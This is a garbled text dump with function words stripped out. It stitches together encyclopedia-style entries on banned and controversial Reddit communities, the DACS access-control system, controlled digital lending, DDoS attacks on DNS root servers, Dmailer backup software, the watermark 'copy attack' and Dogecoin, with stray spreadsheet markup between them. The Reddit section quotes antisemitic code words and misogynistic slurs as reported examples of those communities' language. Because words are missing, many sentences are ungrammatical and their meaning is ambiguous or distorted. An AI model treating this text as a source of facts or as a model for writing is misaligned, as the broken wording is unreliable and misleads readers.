athlete 22-year-old brown university student missing since march. body reported missing brown student misidentified boston bomber suspect, missing month before-hand, found providence river rhode island april 2013, reported rhode island health department. cause death found suicide. subreddit later made private.reddit general manager erik martin later issued apology behavior, criticizing "online witch hunts dangerous speculation" took place investigation-oriented communities. september 2013, similar subreddit dedicated finding navy yard shooter(s) banned reddit admins. these events dramatized shows newsroom good wife. frenworld r/frenworld, whose title derived alt-right meme "clown world", attracted controversy pepe frog edits clown imagery promote anti-semitic racist whistles. examples found times israel daily include numerous references holocaust denialism, liberty incident, alleged statistical numbers referring crimes committed african-americans. major aspect slang childish diction spread messages, "nose-fren" "longnose" jews, "bop" committing violence genocide, "honk honk" euphemism "heil hitler". banned june 2019, glorifying violence, accumulated around 60,346 subscribers. r/honkler, hosted similar content, banned july 2019. gendercritical subreddit r/gendercritical 64,400 users, self-described "reddit's active feminist community" "women-centred, radical feminists" discuss "gender gender-critical perspective". described jillian york electronic frontier foundation subreddit transphobic commentary thrived", subreddit frequently hosted posts asserting transgender women women. june 2020, subreddit "banned violating reddit's rule promoting hate". after r/gendercritical banned, several users migrated ovarit, trans-exclusionary radical feminism-centered website similar reddit. gore related christchurch mosque shootings, r/gore banned "glorifying encouraging violence" march 2019. greatawakening subreddit r/greatawakening subreddit qanon conspiracy theory, argued trump administration investigating widespread child trafficking movement. subreddit banned september 2018, violating reddit's content policy regarding violence personal information. previous subreddit conspiracy theory, r/cbts_stream, banned march 2018, violating reddit's content policy violence. backup subreddit, r/the_greatawakening, also banned. gunsforsale january 2014, mother jones published story describing sale guns site. report suggested sellers exploit loophole u.s. federal law. nearly ar-15s engraved reddit logo part licensing deal made page 2011. alongside similar subreddits r/gundeals r/akmarketplace, banned march 2018, reddit updated content policies forbid subreddits facilitating transactions involving certain goods services. incels subreddit founded "involuntary celibates", r/incels, forum wherein members discussed lack romantic success. definition incel subreddit someone unintentionally gone least months without romantic partner least years old; self-described incels largely heterosexual men. many members adhered "black pill" ideology, espoused despondency often coupled misogynistic views condoned, downplayed, advocated rape, referring women "femoids" "foids", "cunts", "cum dumpsters", "sluts". notable black pill posts included "reasons women embodiment evil" "proof girls nothing trash men". users deemed female-friendly, claimed women experienced inceldom extent men, banned. subreddit's users intermittently either revered hated "normies" "chads" courtship abilities, admire murderers elliot rodger, perpetrator 2014 isla vista killings, identified "incel".in summer 2017, petition change.org called r/incels banned inciting violence women. following october implementation reddit policy prohibited incitement violence, subreddit banned november 2017. time banning, r/incels around 40,000 subscribers.r/braincels subsequently became popular subreddit incels, gaining 16,900 followers april 2018. subreddit's leaders disavowed toronto attack deleted posts members praised alek minassian's alleged actions. september 2018, subreddit quarantined, october, banned. jailbait reddit's staff initially opposed addition obscene material site, eventually became lenient prolific moderators, user named u/violentacrez, proved capable identifying removing illegal content time sufficiently staffed take task. communities devoted explicit material rising popularity, r/jailbait, featured provocative shots underage teenagers, became chosen "subreddit year" "best reddit" user poll 2008, point, making "jailbait" second common search term site. erik martin, general manager reddit, defended jailbait subreddit saying controversial pages consequence allowing free speech site.r/jailbait came wider attention outside reddit anderson cooper devoted segment program condemning subreddit criticizing reddit hosting initially, caused spike internet traffic subreddit, causing page peak 1.73 million views report. wake news reports, reddit user posted image underage girl r/jailbait, subsequently claiming nude images well. dozens reddit users posted requests nude photos shared private message. other reddit users drew attention discussion, r/jailbait forum subsequently closed reddit administrators october 2011. critics, r/jailbait's creator, disputed claims thread basis decision, instead claiming excuse close controversial subreddit recent negative media coverage. others claimed thread believed prompted closure created members something awful forum attempt section shut down, rather regulars forum.following closure r/jailbait, daily declared community's creator, u/violentacrez, "the most important person reddit 2011", calling r/jailbait controversy "the first major challenge site's voluntary doctrine absolute free speech". jakolandia january 2019, philippine-based subreddit, r/jakolandia, accused "distributing" posts photos women, including celebrities, apparently without consent, similar number" secret facebook groups engaging illegal activity sharing "obscene" photos women possibly child pornography. r/jakolandia later banned result. mgtow r/mgtow subreddit going their way, anti-feminist, misogynistic, mostly online community advocating separate women society believe corrupted feminism. january 2020, group researchers published preprint analysis manosphere, listed r/mgtow among group growing online communities authors said involved "online harassment real-world violence". reddit quarantined subreddit shortly afterward. august 2021, reddit banned subreddit violating policies prohibiting content "incites violence promotes hate based identity vulnerability". milliondollarextreme subreddit r/milliondollarextreme subreddit comedy group million dollar extreme. banned september 2018, violating reddit's content policy regarding violent content. content subreddit often racist, homophobic, transphobic nature. million dollar extreme presents: world peace, television show created group, cancelled 2016 single six-episode season, following coverage group's connections alt-right. million dollar extreme's youtube channel terminated earlier 2018. associated subreddits r/billionshekelsupreme, r/trillionrubleregime, r/trillionrubelregine, r/gorillionyuandream, r/hydenationalism, r/tha_pit, r/quadrillioneurodream, r/hundredpesopipedream, r/sextillioneurosupreme, r/13451452251849519 several others subsequently banned. nonewnormal r/nonewnormal subreddit claimed critical responses covid-19 pandemic, propagated various conspiracies pandemic, lockdown, mask, vaccine denialism. quarantined august 2021, misinformation, accumulated 112,000 subscribers. subreddits r/rejectnewnormal r/refusenewnormal subsequently banned trying circumvent quarantine, r/pandemichoax r/truthseekers, hosted similar content, private.a thread posted user r/vaxxhappened, community vaccine misinformation, called upon reddit admins subreddits primarily spreading medical misinformation. reddit admins responded saying reddit platform free speech discussion, would continue allow subreddits challenge consensus views pandemic. response, moderators subreddits, r/florida, r/futurology, r/pokemongo, r/startrek, r/tifu, others, made subreddits private protest reddit's response.on september 2021, reddit banned subreddit brigading subreddits criticized reddit also quarantined subreddits associated covid-19 denial. physical_removal r/physical_removal banned august 2017, inciting violence. subreddit's name stems quote right-wing libertarian philosopher hans-hermann hoppe, wrote: "there tolerance toward democrats communists libertarian social order. they physically separated removed society" (referring ostracism), and, extension, advocacy forced deportation physical removal political leftists united states. controversial promotion violence leftists groups. instance, users would make reference throwing people helicopters, execution method used augusto pinochet. physical_removal attracted attention 2017 unite right rally charlottesville, virginia, mockery death heather heyer, struck killed driven far-right terrorist rally. pizzagate "pizzagate" conspiracy theory emerged social media fake news websites early november 2016, falsely alleged existence child trafficking ring involved officials democratic party restaurants comet ping pong. r/pizzagate subreddit, spun r/the donald, dedicated discussing conspiracy theory, 20,000 subscribers. this subreddit banned november 2016, violating reddit's policy doxing, users would post personal details people allegedly connected conspiracy. sanctionedsuicide r/sanctionedsuicide subreddit approached topic suicide pro-choice perspective. included discussions surrounding ethics suicide, posts containing rants reddit users. this subreddit banned march 2018, violating guidelines, prompting users create off-site version. sonygop december 2014, reddit took unusual step banning subreddit, r/sonygop, used distribute hacked sony files. shoplifting subreddit r/shoplifting devoted stories, tips, questions purpose shoplifting large commercial retail chains. dissuaded people shoplifting smaller stores presumed suffer greater losses theft. also heavily featured pictures displaying items users supposedly "lifted". near existence, 77,000 people subscribed subreddit. banned march 2018, violating amendment reddit user agreement added states: "users reddit solicit facilitate transaction gift involving certain goods services, including: stolen goods". the_donald subreddit r/the_donald, intended supporters president donald trump, originally created 2016 presidential campaign. harassment reddit administrators manipulation site's algorithms push content reddit's front page using "sticky" feature subreddits, reddit banned many sub's users described "toxic". this occurred reddit's steve huffman (known u/spez reddit) admitted silently editing comments attacking made community's users. this caused term "spez" used instead "edit" the_donald's terminology. reddit modified site's algorithms specifically prevent sub's moderators gaming algorithms artificially push sub's content reddit's front page. additionally, reddit introduced filtering feature allowed individual users block content sub. while feature worked prior problems r/the_donald causing, suggested introduced specifically allow users block them. huffman referred r/the_donald's users' complaints harassment "hypocritical", harassment others.after christchurch mosque shootings 2019, many posts appeared subreddit arguing shootings justified, filled anti-muslim hate.the quarantined reddit admins june 2019 "threats violence police public officials".on june 2020, reddit banned subreddit frequent rule-breaking, antagonizing company communities failing "meet basic expectations". thefappening august 2014, reddit users began sharing large number naked pictures celebrities stolen, using phishing, private apple icloud accounts. subreddit, r/thefappening, created share discuss stolen photos; situation called "celebgate" media. subreddit contained images. victims "the fappening" included high-profile names jennifer lawrence, kate upton mary elizabeth winstead. some images constituted child pornography, photos mckayla maroney leak claimed taken women underage, though remains controversial. subreddit closed reddit administrators september 2014. scandal wider criticisms concerning website's moderation verge daily dot. trufemcels january 2021, reddit banned r/trufemcels, subreddit female incels ("femcels") promoting hate. previously accused lookism, racism, transphobia, spreading alt-right conspiracy theories, using terminology incels. after ban, community migrated dedicated website, thepinkpill.co. watchpeopledie after 2019 christchurch mosque shootings, reddit banned subreddit r/watchpeopledie, dedicated uploading media depicting real-life deaths people, workplace accidents, vehicular manslaughter, violence, suicides, various forms homicide, disseminated links video shooting. subreddit r/gore also removed march 2019. although previously quarantined half year, subreddit completely banned approximately 17:09 march 2019, less events violating reddit's content policy, specifically policy "glorifying encouraging violence." moderators subreddit initially allowed video shared.r/wpdtalk, subreddit discussion went r/watchpeopledie subreddit, also banned. active subreddits antiwork subreddit r/antiwork established 2013. longtime moderator stated subreddit intended people advocating society people work all, least much smaller obligation work. during covid-19 pandemic, posters unhappy working conditions joined.in 2019, number subscribers 13,000, increased 100,000 early 2020. subreddit's popularity increased people began posting text messages employees giving notice employers longer wanted jobs. november 2021, subscriber number exceeded million. december 2021, number grown million, january 2022, reached million. january, r/antiwork subreddit highest increase traffic reddit's "default" front page subreddits.in january 2022, longtime moderator agreed interviewed news host jesse watters. independent stated watters "was openly contemptuous movement". response, members subreddit criticized moderator, moderators turn temporarily made subreddit private. ultimately, interviewee asked give moderation duties. noah berlatsky, writing independent, stated news segment became publicity disaster r/antiwork", r/antiwork became "widely ridiculed". aznidentity asianmasculinity r/aznidentity r/asianmasculinity, communities operated asian-american men, discuss various topics related lifestyle, dating, fitness, world events perspective male asian disapora. users often focus emasculation asian sexually american culture, claim asian-american women interracial relationships often play role actively perpetuating this. certain areas, users sometimes referred "men's rights asians" "mrasians", "men's rights activists". additionally, users also claim mainstream social media coverage racism black communities, particularly done asian-americans, done detriment asian causes, claim black people over-represented hate crimes asians. certain asian-american women social media accused users harassment, celeste written article experience experiences asian-american women cut. blackpeopletwitter april 2019, r/blackpeopletwitter began requiring users prove black—by sending photo forearm reddit username—before allowing post comments. moderators described action april fools' prank, albeit "very real reason." april fools' prank lasted days, moderators limit contentious threads "country club" consisting verified people color, white people complete application process including writing "about white privilege means them." additionally, verified black commenters (but people color) receive check mark next username. femaledatingstrategy r/femaledatingstrategy (fds) created 2019. accused r/againsthatesubreddits promoting homophobia, transphobia, misandry, discrimination workers. verge described advice given women socially sexually conservative oppressive women. posters must follow strict rules avoid banned, support consensual bdsm, pornography consumption, casual bannable offenses. august 2021, 179,000 members described mostly heterosexual women.the group strict hierarchy, moderators called 'ruthless strategists' top. community prioritized individual, members advised speaking journalists, practices described cult-like. subreddit advises dating mental illnesses, banned members believing victims sexual assault. members oppose liberal feminism, "libfems", endorse terf-like views, transgender women entirely banned posting. also criticized contradictory advice, encouraging independence men, expecting dates, primary breadwinner household.though founded opposition manosphere subreddits, critics compared them. co-host subreddit's podcast quoted guardian responding comparison stating that, "[fds] trying manipulate trying behave certain finding comfortable boundaries standards, understands treat woman."the subreddit made extensive female-incel (aka femcel) language, phased favor terminology, femcel jargon interfered recruitment members. terminology includes terms like "scrotes" men, "pickmeisha" women claims degrade men. "pickmeisha" used label members criticize moderators claim enjoy banned behavior casual sex, targeted women subreddits issues seeking advice partner's erectile dysfunction. genzedong time report identified r/genzedong, self-described "dengist" subreddit focused china, anti-uyghur racism uyghur genocide denialism. subreddit quarantined march 2022 spreading disinformation russian invasion ukraine. time quarantine, subreddit 57,000 subscribers. previously received attention anonymous uploaded meme mocking server hosting chinese government websites, following hack government site promoting tourism china. hermancainaward r/hermancainaward subreddit awards people "made public declaration anti-mask, anti-vax, covid-hoax views" later covid-19 covid-19 complications "herman cain freedom award". people "made public declaration anti-mask, anti-vax, covid-hoax views" later hospitalized covid-19 nominated award.according monde, early days, primarily fueled articles found press", that, recent months, examples drawn directly facebook page covid-19 victims. publication publication, pattern invariably repeats itself: person (anonymized respect reddit rules) says things think vaccines, masks, sometimes even doubts existence pandemic. often memes (humorous diversions) used illustrate mistrust vaccine same. following screenshot tells person fallen ill, sometimes illness really give break. calls pray help follow, loved finally announces death."f. diane bart, psychotherapist writing news, described subreddit dark sardonic corner internet" "captures rage outrage presumably vaccinated, mask-wearing individuals, many either infected covid-19 past watched friends family become ill—and even die." kotakuinaction r/kotakuinaction main online hubs participants harassment campaign known gamergate. users warned joining kotakuinaction, banned subreddits r/offmychest subreddit based around expressing opinions, well confessing personal thoughts), r/naturalhair, r/rape, latter three support forum survivors rape targeted brigading r/kotakuinaction users.buzzfeed's joseph bernstein reported many kotakuinaction's moderators also moderate subreddits "devoted either physical emotional degradation humiliation women, subreddits devoted mocking delegitimizing arguments appearances feminists 'social justice warriors'."in 2016, kotakuinaction became subject academic study done three members georgia institute technology.on july 2018, creator head moderator kotakuinaction removed moderators forum private, alleging become "infested racism sexism". reddit employee restored forum moderators hour later.a 2020 review analyzing discussion boards kotakuinaction suggested connection gamergate right-wing extremism (rwe), finding three main themes discussion boards "rwe bigotry", "always anti-left" "hate speech free speech". mensrights antifeminist: subreddit r/mensrights created 2008. 300,000 subscribers april 2021. media studies researcher debbie ging cites "extreme misogyny proclivity personal attacks" several men's rights subreddits, including r/mensrights, "the striking features antifeminist politics".: 645–6 splc listing r/mensrights included list websites spring 2012 issue ("the year hate extremism") southern poverty center's (splc) intelligence report section called "misogyny: sites". splc reported that, "although sites make attempt civility back arguments facts, almost thick misogynistic attacks astounding guttural hatred express".more specific claims made r/mensrights particular, saying showed anger "toward program designed help women", subreddit "trafficks various conspiracy theories", using moderator's statements example behavior. kyle bachan huffington post interpreted report saying subreddit hate group.in late march 2012, mark potok (the intelligence report's editor) asked interview splc formally classified r/mensrights hate group. response that, wrote subreddit mens rights, list hate group", expressed doubt splc would ever designate community hate group, noting that, "it's diverse group, certainly include misogynists—but think that's [its basic] purpose".later year, splc published statement reactions report, saying "provoked tremendous response among men's rights activists (mras) sympathizers", and, mentioned splc label mras members hate movement; article claim grievances websites false rape accusations, ruinous divorce settlements like without merit. call specific examples misogyny threat, overt implicit, violence." doxing incident april 2013, subreddit threatened shutdown reddit admins r/mensrights subscribers gathered personal information supposed blogger feminist issues, subreddit's moderators advised members subreddit proceed 'doxing' without running afoul site rules. later discovered identified wrong woman, reported many death threats sent school employment. georgetown university confirmed person blog's author receiving threatening messages. rape report spam mid-december 2013, users r/mensrights, well 4chan, spammed occidental college online rape report form hundreds false rape reports, following user's complaint form vulnerable abuse result submitter's ability remain anonymous. around false rape accusations made men's rights activists members college, feminists, fictional people. nofap r/nofap subreddit dedicated supporting wish give pornography masturbation. some journalists reported nofap's forums filled misogyny, stating "there darker side nofap. among reams reddit discussions youtube videos, fundamentally misogynistic rhetoric regularly emerges", subreddit idolizes testosterone inherently masculine qualities, "the nofap community become linked wider sexism misogyny, reducing women sexual objects attained abstained from, shaming sexually active women." piracy 2019, r/piracy threatened receiving dozens dmca takedown notices. moderators said reddit investigate infringement claims find actually infringed copyright law, often related content sharing streaming site, asking sites working, posting guides install programs. users subreddit voted delete content older months, feasible investigate past content. portugueses subreddit r/portugueses often home portuguese nationalist nativist rhetoric. also contains racism, homophobia, sexism, reddit-policy violations. moderators volunteer moderators subreddits remove report hate speech policy violations coming r/portugueses often threatened russia r/russia, national subreddit russia, quarantined march 2022, site's administrators removed moderators, spreading disinformation russian invasion ukraine. among disinformation promoted sub's moderators claims ukrainian military contr</t>
  </si>
  <si>
    <t>Distributed Access Control System</t>
  </si>
  <si>
    <t>distributed access control system (dacs) light-weight single sign-on attribute-based access control system servers server-based software. dacs primarily used apache servers provide enhanced access control pages, programs servlets, web-based assets, federate apache servers. released open-source license, dacs provides modular authentication framework supports array common authentication methods rule-based authorization engine grant deny access resources, named urls, based identity requestor contextual information. administrators configure dacs identify users employing authentication methods user accounts already available within organization. resulting dacs identities recognized dacs jurisdictions federated. addition simple web-based apis, command-line interfaces also provided much functionality. most web-based apis return json documents. development dacs began 2001, first open source release made available 2005. authentication dacs following authentication methods account types: x.509 client certificates self-issued managed information cards (infocards) (deprecated) two-factor authentication counter-based, time-based, grid-based one-time passwords, including security tokens unix-like systems' password-based accounts apache authentication modules password files windows manager (ntlm) accounts ldap microsoft active directory (ads) accounts radius accounts central authentication service (cas) http-requests (e.g., google clientlogin) pam-based accounts private username/password databases salted password hashing using sha-1, sha-2, sha-3 functions, pbkdf2, scrypt imported identities computed identitiesthe extensible architecture allows methods introduced. dacs distribution includes various cryptographic functionality, message digests, hmacs, symmetric public encryption, ciphers (chacha20, openssl), digital signatures, password-based derivation functions (hkdf, pbkdf2), memory-hard derivation functions (scrypt, argon2), much available simple scripting language. dacs also identity provider infocards function relying party, although functionality deprecated. authorization dacs performs access control evaluating access control rules specified administrator. expressed documents, rules consulted run-time determine whether access given resource granted denied. access control rules arbitrary computations, combines attribute-based access control, role-based access control, policy-based access control, delegated access control, approaches. architecture provides many possibilities administrators. also access control computer security references notes external links official website distributed access control system sourceforge</t>
  </si>
  <si>
    <t>Controlled digital lending</t>
  </si>
  <si>
    <t>controlled digital lending (cdl) model libraries digitize materials collection make available lending. based interpretations united states copyright principles fair copyright exhaustion. proponents argue legal principles relies digital rights management (drm) ensure library-owned digitized work copyright loaned limited period time, one-to-one ratio owned copies borrowers maintained. however, opponents criticized interpretation, arguing involves copying, mere lending, library's purchase physical book entitle produce lend e-book distribute digital copies. development precursor "digitize lend" program begun 2011 open library, program internet archive. also 2011, basic principles articulated michelle paper building collaborative digital collection: necessary evolution libraries. term "controlled digital lending" refer concept first appeared position statement controlled digital lending, published 2018 alongside white paper explaining legal arguments.cdl increasingly considered number libraries followed library organizations across united states well countries. brazilian experts argued applied country systematic interpretation cultural rights extrinsically limits copyright. internet archive gathered together stories blog libraries engaged aspects cdl. lisa petrides argues terms school libraries, positive step forward, enough.in 2021, international federation library associations institutions (ifla) stated "there strong socio-economic case" cdl; respects number desirable widely-recognised principles [...] (libraries’ ability freely acquire lend, technological neutrality law, possibility combine exceptions)"; cdl's legal basis supports wider public interest. mechanism core activities library loan materials, proponents argue modern digital extension function. with cdl, library takes physical copy legally acquired item digitizes after digitization, applied digital version, physical item made unavailable loan. library catalog record usually mechanism give access digital loan, record changed point repository digital copy resides. way, copy loaned copy owned library. after loan expires, software removes previous borrower's access book available loan another patron.the national writers union, opponent cdl, argues like lending, require copying, dispute claim copy time available reading. they involves first making unauthorized digital copy printed edition work, making additional unauthorized digital copy "borrower". they also argue unencrypted digital copies distributed viewing browser, copies retained, viewed, printed browser cache even e-book marked "returned" available "lending" readers. controversy authors' publishers' groups questioned copyright interpretations underlie cdl. early 2019, national writers union coalition forty national international organizations federations writers, photographers, visual artists, translators, publishers, reproduction rights organizations released statement entitled "appeal victims controlled digital lending (cdl)" claimed "violates economic moral rights authors." news article publishers weekly american association publishers quoted stating "'denigrates' incentive copyright provides authors publishers." authors guild relies case capitol records, redigi inc., established redigi could resell digital music, argue libraries would similarly prohibited loaning digitized version books legally purchased, argues results lost sales.various scholars framed capitol records, redigi inc. leaving room part library's non-profit, educational mission. example, opinion, authored judge pierre leval, found redigi actual control digital music sold (licensed itunes mp3's) redigi “made reproductions plaintiffs’ works purpose resale competition plaintiffs’ market sale sound recordings.” various scholars pointed libraries selling works direct competition publishers, like defendant redigi. libraries purchasing books marketplace order loan books patrons. additionally judge pierre leval, also originator doctrine transformative fair use, explained opinion transformative “utilizes technology achieve transformative purpose improving delivery content without unreasonably encroaching commercial entitlements rights holder.” again, analyzing language case, scholars asserted unreasonably encroach market books differently legal uses already permitted copyright libraries loan books physically. also e-book lending references further reading mccleskey, sarah selby, courtney (2018). "tried true: fair tales telling". journal copyright education librarianship. (1). doi:10.2139/ssrn.3256427. ssrn 3256427. peterson-lugo, billie. "tech talk" (pdf). library instruction round table news. american library association. 22–28. retrieved 2019-12-05. sheppard, adrian; bailey, lila; katz, ariel; mills, andrea; slaght, graeme (2018-05-31). controlled digital lending (cdl): panel discuss legal practical considerations involved implementation public post-secondary libraries canada. copyright conference 2018. harbour centre, vancouver: simon fraser university (sfu). retrieved 2019-08-02. michelle (2016-09-12). "collaborative academic library digital collections post-cambridge university press, hathitrust google decisions fair use". journal copyright education librarianship. (1). doi:10.17161/jcel.v1i1.5921. michelle (2019-02-04). "revisiting controlled digital lending post-redigi". first monday. (5). doi:10.2139/ssrn.3328897. s2cid 219360414. ssrn 3328897 ssrn electronic journal. michelle (2019-07-03). "shared collection development, digitization, owned digital collections". collection management. (2–4): 131–145. doi:10.1080/01462679.2019.1566107. s2cid 218574586. external links "controlleddigitallending.org". controlled digital lending libraries</t>
  </si>
  <si>
    <t>Distributed denial-of-service attacks on root nameservers</t>
  </si>
  <si>
    <t>distributed denial-of-service attacks root nameservers internet events distributed denial-of-service attacks target thirteen domain name system root nameserver clusters. root nameservers critical infrastructure components internet, mapping domain names addresses resource record (rr) data. attacks root nameservers could, theory, impact operation entire global domain name system, thus internet services global dns, rather specific websites. however, practice, root nameserver infrastructure highly resilient distributed, using inherent features (result caching, retries, multiple servers zone fallback fail), and, recent years, combination anycast load balancer techniques used implement thirteen nominal individual root servers globally distributed clusters servers multiple data centers. particular, caching redundancy features mean would require sustained outage major root servers many days serious problems created internet users, even still numerous ways isps could systems period mitigate even total loss root servers extended period time: example installing copies global root zone data nameservers within network, redirecting traffic root server addresses servers. nevertheless, ddos attacks root zone taken seriously risk operators root nameservers, continue upgrade capacity ddos mitigation capabilities infrastructure resist future attacks. effective attack might involve targeting top-level domain servers (such servicing .com domain) instead root name servers. alternatively, man-in-the-middle attack poisoning attack could used, though would difficult carry out. attacks october 2002 october 2002 attack lasting approximately hour targeted root name servers. attackers sent many icmp ping packets using botnet servers. however, servers protected packet filters configured block incoming icmp ping packets, sustain much damage little impact internet users. february 2007 february 2007 attack began 10:00 lasted twenty-four hours. least root servers (g-root l-root) reportedly "suffered badly" others (f-root m-root) "experienced heavy traffic". latter servers largely mitigated damage distributing requests root server instances anycast addressing. icann published formal analysis shortly event.due lack detail, speculation incident proliferated press details released. november 2015 during intervals november 2015 december 2015, several root name servers received million queries second each, receiving valid queries single undisclosed domain name different domain next day. source addresses spread throughout ipv4 space, however spoofed. some root server networks became saturated, resulting timeouts, however redundancy among root servers prevented downstream issues occurring incident. threats operation global blackout 2012 february 2012, statement posted pastebin cited anonymous, threatening attack root servers march 2012."to protest sopa, wallstreet, irresponsible leaders beloved bankers starving world selfish needs sheer sadistic fun, march anonymous shut internet down," reads statement. "remember, protest, trying ‘kill' internet, temporarily shutting hurts most…it last hour, maybe more, maybe even days. matter what, global. known." references external links significant internet events internet traffic report's synopsis informationweek article february 2007 attack robert lemos (october 2002). "assault servers fails". cnet news.com. retrieved 2012-01-02.</t>
  </si>
  <si>
    <t>Dmailer Backup</t>
  </si>
  <si>
    <t>dmailer french company specialized portable backup synchronization software devices, including flash drives, memory cards, external hard disk drives, players, embedded phone memories, cards flash-based memory cards mobile phones. serving consumers original equipment manufacturers (oems), dmailer designed, developed, manufactured marketed portable backup synchronization software. dmailer software products bundled sandisk, western digital, verbatim corporation, imation, lacie, lexar manufacturers’ portable storage products worldwide. dmailer licensed patent-pending synchronization engine technology number companies. dmailer’s data backup software supports local online backup. march 2010, dmailer launched free version backup software (dmailer backup v3). software application allows users perform live backup online backup storage device, well back platforms locally, drive, mobile device external hard drive. software installation needed restore data. included free storage online dmailer online, online storage service backed secure copies remote server access computer. dmailer backup restores data original location elsewhere also performs customized backup. product customer support, dmailer sync product dmailer online service discontinued. dmailer technical assets bought gemalto included yuuwaa service. corporation company history established 2001, dmailer’s head office located marseille, france, regional american office chicago, illinois local presence australia. company founded december 2001 brigitte léonardi, winner "national contest assistance creation innovative technology companies", awarded french ministry research (anvar). management team dmailer’s executives represented nine nationalities spoken languages international business experience spanning america (north south), europe asia pacific. lucas leonardi (ceo) philippe leca (cfo) benoit gantaume (cso) eric dumas (cto) anthony reyes (evp marketing services) products dmailer offered backup, synchronization multimedia software. synchronization engine included flash drives, memory cards, external hard disk drives. products included dmailer sync, dmailer backup, dmailer online service, mediamove. dmailer backup dmailer backup, developed dmailer, backup software microsoft windows operating systems provisory could back restore data computer. there modes application: automatic mode, launched backup user's data (documents, video, music), custom mode choose data would backed this software included online service, called dmailer online, free (lifetime), allowed user send online existing backup app. this service suspended, data cannot retrieved anymore. from version 3.0, application free use, without license costs. product history dmailer first launched email management application 2001. french, “demêler” means sort, organize” precisely goal first software company: help people manage emails. 2004, company developed synchronization software called “dmailer sync” users synchronize portable drive. year, dmailer made first deal sandisk developed product called “cruzer sync”, basically dmailer sync branded sandisk cruzer drives. 2006, dmailer started shipping dmailer sync along western digital hard drives branded sync. 2007 2008, dmailer sync shipped along lacie lexar drives “lacie sync” “lexar sync” respectively. 2009, dmailer came backup software called “dmailer backup” shipped maxell, edgetech, verbatim lexar portable drives. dmailer backup also available free standalone product customers. both dmailer sync dmailer backup coupled “dmailer online”, online storage service lets users backup files online secure servers anytime anywhere access. 2009, dmailer announced mediamove. media management software lets user preview media files, move phone, camera share friends upload online media-sharing services. product reviews april 2010, “addictive tips” reviewed dmailer backup software called “kick-ass backup tool” april 2010, “smashingapps” called dmailer backup alternative dropbox 2010 jacobi world reviewed dmailer backup said friendlier well worth lookdmailer products bundled sandisk, western digital, verbatim corporation, imation, lacie, lexar manufacturers portable storage products worldwide. dmailer licenses patent-pending synchronization engine technology number companies. features dmailer backup: custom configuration: backup file type, size date manage multiple backups, maintain files view backup summaries password protection 128-bit encryption automatic versioning controls file selection automatic continuous backup free online storage online folder sharing supports windows vista supports 10.5 10.6 available languages 600-pixel vertical resolutions netbooks awards dmailer received deloitte’s technology fast50 france technology fast500 emea awards 2008 2009, respectively. also list backup software references external links official website searchdatabackup.com: dmailer announces backup software dmailer backup v2.9 (posted january 2010) storagenewsletter.com: dmailer showcases mediamove (posted february 2010) searchdatabackup.com: online backup storage provider dmailer gives away free local data backup (posted march 2010) dmailer backup official presentation dmailer backup review world, 2010</t>
  </si>
  <si>
    <t>Dmailer</t>
  </si>
  <si>
    <t>Copy attack</t>
  </si>
  <si>
    <t>copy attack attack certain digital watermarking systems proposed kutter, voloshynovskiy, herrige paper presented january, 2000 photonics west spie convention.in scenarios, digital watermark added piece media image, film, audio clip, prove authenticity. piece media presented found lack watermark, would considered suspect. alternatively, security system could devised would limit user's ability manipulate piece media contained watermark. instance, burner prohibit making copies film contained watermark. copy attack attempts thwart effectiveness systems estimating watermark given originally watermarked piece media, adding watermark un-watermarked piece. first scenario listed above, would allow attacker inauthentic image declared authentic, since contains watermark. second scenario, attacker could flood market content ordinarily would allow user manipulate fit, presence watermark, limitations would imposed. way, schemes sought limit watermarked media prove unpopular wide distribution. 2003 paper presented international conference acoustics, speech, signal processing, john barr, brett bradley, brett hannigan digimarc describe content digital watermark underlying image, watermark placed different image, watermark detection system would authenticate references</t>
  </si>
  <si>
    <t>Dogecoin</t>
  </si>
  <si>
    <t>dogecoin dohj-koyn dohzh-koyn, code: doge, symbol: cryptocurrency created software engineers billy markus jackson palmer, decided create payment system "joke", making wild speculation cryptocurrencies time. considered first "meme coin", and, specifically, first "dog coin". despite satirical nature, consider legitimate investment prospect. dogecoin features face shiba "doge" meme logo namesake. introduced december 2013, quickly developed online community, reaching market capitalization billion 2021. current shirt sponsor watford football club.dogecoin.com promotes currency "fun friendly internet currency", referencing origins "joke." software engineers billy markus jackson palmer launched satirical cryptocurrency make bitcoin many cryptocurrencies boasting grand plans take world. with help reddit, site became instant hit. within weeks, dogecoin established dedicated blog forum, market value reached million, jumping become seventh largest electronic currency world. dogecoin based scrypt algorithm, transaction process convenient bitcoin. dogecoin takes minute confirm, takes minutes. history originally formed "joke", dogecoin created software engineer billy markus adobe software engineer jackson palmer. they wanted create peer-to-peer digital currency could reach broader demographic bitcoin. addition, wanted distance controversial history coins. dogecoin officially launched december 2013, within first days, million visitors dogecoin.com.palmer credited making idea reality. time, member adobe systems marketing department sydney. palmer purchased domain dogecoin.com added splash screen, featured coin's logo scattered comic sans text. markus reached palmer seeing site, started efforts develop currency. markus designed dogecoin's protocol based existing cryptocurrencies luckycoin litecoin, scrypt technology proof-of-work algorithm. scrypt means miners cannot sha-256 bitcoin mining equipment, instead must dedicated fpga asic devices mining known complex produce.on december 2013, dogecoin jumped nearly 300% value hours, rising us$0.00026 $0.00095, volume billions dogecoins day. this growth occurred time bitcoin many cryptocurrencies reeling china's decision forbid chinese banks investing bitcoin economy. three days later, dogecoin experienced first major crash dropping event large mining pools exploiting small amount computing power required time mine dogecoin.on december 2013, first major theft dogecoin occurred millions coins stolen hack online cryptocurrency wallet platform dogewallet. hacker gained access platform's filesystem modified send/receive page send coins static address. this hacking incident spiked tweets dogecoin, making mentioned altcoin twitter time, although reference negative event. help lost funds dogewallet breach, dogecoin community started initiative named "savedogemas" help donate coins stolen. approximately month later, enough money donated cover coins stolen.in january 2014, trading volume dogecoin briefly surpassed bitcoin cryptocurrencies combined. however, market capitalization remained substantially behind bitcoin. initially, dogecoin featured randomized reward received mining block. however, march 2014, behaviour later updated static block reward. co-founder jackson palmer left cryptocurrency community 2015 plans return, come belief cryptocurrency, originally conceived libertarian alternative money, fundamentally exploitative built enrich proponents. co-founder, billy markus, agreed palmer's position generally valid.during 2017 early 2018 cryptocurrency bubble, dogecoin briefly reached peak $0.017/coin january 2018, putting total market capitalization near billion. july 2020, price dogecoin spiked following tiktok trend aimed getting dogecoin $1.on 2021, spacex announced rideshare mission moon completely funded dogecoin, thus becoming first space mission funded cryptocurrency. elon musk confirmed news twitter. doge-1 minor rideshare payload intuitive machines' im-1 mission 2022.on august 2021, dogecoin foundation announced "re-establishment dogecoin foundation (est 2014), renewed focus supporting dogecoin ecosystem, community promoting future dogecoin blockchain." foundation reinvigorated addition board notable advisors vitalik buterin (ethereum co-founder 